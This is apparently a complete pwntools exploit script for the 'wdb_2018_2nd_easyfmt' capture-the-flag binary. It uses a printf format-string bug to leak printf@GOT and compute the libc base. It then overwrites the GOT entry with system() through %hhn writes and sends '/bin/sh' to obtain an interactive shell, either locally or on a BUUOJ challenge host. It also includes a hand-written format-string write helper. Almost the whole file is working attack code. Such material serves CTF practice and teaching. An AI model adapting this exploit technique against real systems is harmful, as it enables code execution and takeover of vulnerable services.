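from pwn import *

# Exploit for wdb_2018_2nd_easyfmt (i386, non-PIE: the GOT address below is fixed).
# The target is a "repeater": it reads our input and hands it straight to
# printf(), so a format string gives an arbitrary stack read and write.
#
# Plan:
#   1. leak printf@GOT with "%6$s" (argument 6 is where our buffer lands on
#      the stack) and derive the libc base from it;
#   2. overwrite printf@GOT with system() through byte-wise %hhn writes;
#   3. send "/bin/sh" -- the next printf(buf) is now system("/bin/sh").
#
# Written to run under both Python 2 and Python 3 pwntools (bytes literals,
# log.* instead of print statements, // instead of /).

BINARY = './wdb_2018_2nd_easyfmt'
GOT_PRINTF = 0x804A014      # printf@GOT in the (non-PIE) binary
FMT_OFFSET = 6              # stack argument index at which our own input starts
REMOTE = False              # True: attack the BUUOJ instance instead of a local copy

context.log_level = 'debug'
elf = ELF(BINARY)
context.binary = elf        # arch/bits/os for p32()/fmtstr_payload() follow the target

if REMOTE:
    p = remote('node3.buuoj.cn', 29254)
    # Must be the remote libc build; the page-offset check after the leak
    # catches a mismatch before we corrupt the GOT.
    libc = ELF('./libc/libc-2.23x86.so')
else:
    p = process(BINARY)
    libc = elf.libc         # the libc the local loader resolves for this binary


def manual_fmtstr_write(offset, addr, value):
    """Hand-rolled equivalent of fmtstr_payload() for one 32-bit write.

    Returns a format string that stores ``value`` at ``addr`` one byte at a
    time using four ``%hhn`` conversions.  ``offset`` is the stack argument
    index of the first dword of our input; the four target addresses are
    placed first and therefore occupy arguments offset..offset+3.

    Kept for reference only -- the exploit below sends fmtstr_payload(),
    which is what was verified against this target.
    """
    addrs = b''.join(p32(addr + i) for i in range(4))
    payload = addrs
    written = len(addrs)            # characters printf has emitted so far
    for i in range(4):
        target = (value >> (8 * i)) & 0xff
        # %hhn stores (chars written) mod 256, so only the distance to the
        # wanted low byte matters.  The %Nc padding needs N >= 1 or printf
        # would emit 1 char for a 0 width (and a negative width means
        # left-justify), so wrap upward instead of emitting 0 or less.
        need = (target - written) % 0x100
        if need == 0:
            need = 0x100
        payload += b'%%%dc%%%d$hhn' % (need, offset + i)
        written += need
    return payload


p.recvuntil(b'Do you know repeater?')

# --- 1. leak printf@GOT -------------------------------------------------
# The echo is our 4 raw address bytes followed by whatever %s finds at
# GOT_PRINTF, i.e. the libc address of printf.  (%s stops at a NUL byte; a
# pointer containing one gives a short leak that the check below rejects.)
p.send(p32(GOT_PRINTF) + b'%%%d$s' % FMT_OFFSET)        # == b'%6$s'
# Anchor on the echoed address rather than hunting for a 0xf7 byte: the old
# recvuntil('\xf7')[-4:] stops at the *first* 0xf7 in the stream, which
# yields garbage whenever a lower byte of the leaked pointer is also 0xf7.
p.recvuntil(p32(GOT_PRINTF))
printf_addr = u32(p.recvn(4))
log.info('printf@libc: %#x' % printf_addr)

# Sanity check: a symbol's page offset is fixed per libc build, so a mismatch
# means the wrong libc (or a truncated leak).  Stop here instead of writing a
# bogus system() address into the GOT.  log.error() raises.
if (printf_addr & 0xfff) != (libc.symbols['printf'] & 0xfff):
    log.error('leak %#x does not match printf offset %#x in %s'
              % (printf_addr, libc.symbols['printf'], libc.path))

libcbase = printf_addr - libc.symbols['printf']
system_addr = libcbase + libc.symbols['system']
log.success('libc base: %#x  system: %#x' % (libcbase, system_addr))

# --- 2. printf@GOT -> system ---------------------------------------------
# fmtstr_payload() builds an equivalent set of byte-wise %hhn writes to what
# manual_fmtstr_write(FMT_OFFSET, GOT_PRINTF, system_addr) produces; either
# way the repeater has to read the whole payload in a single read().
payload = fmtstr_payload(FMT_OFFSET, {GOT_PRINTF: system_addr})
# The original exploit paced each send with sleep(1); presumably the repeater
# loop has no prompt to synchronise on, so without it consecutive sends could
# be coalesced into one read().  Keep the pacing.
sleep(1)
p.send(payload)

# --- 3. trigger: printf(buf) is now system(buf) --------------------------
sleep(1)
p.send(b'/bin/sh\x00')      # NUL-terminated so system() sees exactly "/bin/sh"
p.interactive()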